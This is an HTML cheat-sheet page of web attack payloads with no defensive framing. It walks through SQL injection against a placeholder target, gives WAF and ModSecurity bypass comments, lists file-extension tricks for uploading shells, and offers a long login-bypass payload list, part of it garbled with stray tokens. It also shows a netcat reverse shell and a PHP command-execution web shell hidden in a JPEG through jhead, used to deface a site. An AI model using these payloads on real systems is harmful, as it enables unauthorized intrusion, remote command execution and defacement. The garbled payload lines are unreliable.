<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">

<style>
           body{
           background:black;
           }
           .px{
           border:solid 1px #00FF00;
           background:#000000;
           height:15px;
           padding:10px;
           color:red;
           font-family:courier;
           font-weight:bold;
           width:320px;
           border-radius:7px;
           text-align:center;
           }
           .x{
           color:white;
           text-align:center;
           margin-top:15px;
           font-size:12px;
           font-weight:bold;
           font-family:courier;

  }
  .p {
    border:solid 1px #00FF00;
    color:#FFFFFF;
    font-family:courier;
    padding-left:30px;
    padding-right:30px;
    margin-bottom:3px;
    padding-top:10px;
    padding-bottom:10px;
    font-size:13px;
    border-radius:7px;
    margin-top:3px;
    
      }
    .p li{
    margin-bottom:2px;
      }
</style>
  </head>
  <body>

	<div class="px">
      Basic SQL Injection
	</div>
	<div class="p">
	  Check Vuln.
	  <br><br>
		  http://www.target.com/index.php?id=25'<br>

			<br>
			  Check How many Column Order By Method.
			  <br><br>
				  http://www.target.com/index.php?id=25 order by 10-- -> error<br>
					http://www.target.com/index.php?id=25 order by 9-- -> not error<br><br>
						Check Vulnerable Column Union Select Method.
						<br><br>
							http://www.target.com/index.php?id=25+Union+Select+1,2,3,4,5,6,7,8,9--<br>
							  <br>
								Print Database,Version and User<br><br>
									http://www.target.com/index.php?id=25+Union+Select+1,concat(database(),<br>user(),version()),3,4,5,<br>
										6,7,8,9--<br>


	</div>
	<div class="px">
	  Bypass 403 Forbidden SQLi
	</div>
	<div class="p">
	  /*!50000*/<br><br>
		  /*!50000UNION*/+/*!50000SELECT*/


		  <br>


	</div>
	<div class="px">
	  Bypass Mod Security SQLi
	</div>
	<div class="p">

	  /*!00000*/<br><br>
		  /*!00000UNION*/+/*!00000SELECT*/
	</div>
	<div class="px">
	  Shell Upload Bypass Extensions
	</div>
	<div class="p">
	  shell.phtml<br>
		shell.php jpg<br>
		  shell.php.txt<br>
			shell.php;_.fla<br>
			  shell.pjpeg<br>
				shell.cin<br>
				  shell.shtml<br>
					shell.pjpg.php.jpg<br>
					  shell.php;.jpg<br>
						shell.php.xxxjpg<br>
						  shell.php.test<br>
							shell.php3<br>
							  shell.php5<br>
								shell.jpg.PhP<br>
								  shell.php.jpg<br>
									shell.php.fla<br>
									  shell.php%00.jpg<br>
										shell.php.;jpg<br>
										  shell.PhP.txt<br>
											shell.php.png<br>
											  shell.php.gif<br>

	</div>

    <div class="px">
	  Bypass Login Authentication
    </div>

    <div class="p">
	   18 or 1=1  13 <br>
		1'or 191'= 191 <br>
		  admin 19 13 <br>
			 1d or 0=0  13 <br>
			  or 0=0  13 <br>
				 18 or 0=0 # <br>
				   1d or 0=0 # <br>
					or 0=0 # <br>
					   18 or  18x 19='x <br>
						 1d or  1cx 1d= 1dx <br>
						   18) or ( 18x 19='x <br>
							 18 or 1=1 13 <br>
							   1d or 1=1 13 <br>
								or 1=1 13 <br>
								   18 or a=a 13 <br>
									 1d or  1ca 1d= 1da <br>
									   18) or ( 18a 19='a <br>
										 1c) or ( 1ca 1d= 1da <br>
										  hi 1d or  1ca 1d= 1da <br>
											hi 1d or 1=1  13 <br>
											  hi 19 or 1=1  13 <br>
												hi 19 or  18a 19='a <br>
												  hi 19) or ( 18a 19='a <br>
													hi 1d) or ( 1ca 1d= 1d) <br>
													  admin'-- <br>
														= 'or' 1=1 <br>
														  ' or 1=1-- <br>
															'" or 1=1-- <br>
															  ' union select 1, 'Eyeless', 'ez2do', 1-- <br>
																admin'-- <br>
																  administrator'-- <br>
																	superuser'-- <br>
																	  test'-- <br>
																		' or 0=0 -- <br>
																		  ' or 0=0 --' <br>
																			' or 0=0 # <br>
																			  " or 0=0 -- <br>
																				" or 0=0 --' <br>
																				  '" or 0=0 -- <br>
																					or 0=0 -- <br>
																					  ' or 0=0 # <br>
																						" or 0=0 # <br>
																						  or 0=0 # <br>
																							' or 'x'='x <br>
																							  " or "x"="x <br>
																								') or ('x'='x <br>
																								  " or 1=1-- <br>
																									or 1=1-- <br>
																									  ' or a=a--' <br>
																										' or a=a # <br>
																										  ' or a=a-- <br>
																											' or "a"="a <br>
																											  ' or 'a'='a <br>
																												" or "a"="a <br>
																												  ') or ('a'='a <br>
																													") or ("a"="a <br>
																													  hi" or "a"="a <br>
																														hi" or 1=1 -- <br>
																														  hi' or 1=1 -- <br>
																															hi' or 'a'='a <br>
																															  hi') or ('a'='a <br>
																																hi") Or ("a"="a <br>
																																  ' Or 1=1-- <br>
																																	" or 1=1-- <br>
																																	  or 1=1-- <br>
																																		' or 'a'='a <br>
																																		  " Or "a"="a <br>
																																			') or ('a'='a <br>
    </div>
    <div class="px">
	  How to use reverse shell
    </div>
    <div class="p">
	  Open Termux:<br><br>
		  pkg install netcat<br><br>
			  nc -lnvp 4444<br>
				nc -e /bin/sh 127.0.0.1 4444
    </div>
    <div class="px">
	  How to make jpg shell using Jhead
    </div>
    <div class="p">
	  Open Termux<br><br>
		  Command:<br>
			pkg install jhead<br>
			  jhead -purejpg shell.jpg<br>
				jhead -ce shell.jpg<br><br>
					if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}
					'__halt_compiler();</h1><br><br>
						jhead shell.jpg<br><br>
							Upload File:<br>
							  /shell.php?cmd=ls<br>
								/shell.php?cmd=echo 'Baba Fucked Your Site' > baba.txt
    </div>
    <div class="px">
	  How to run localhost using termux
    </div>
    <div class="p">
	  Open termux 
	  <br><br>
		  Command:<br>
			pkg install php<br>
			  php -S localhost:8080

    </div>


  </body>

</html>
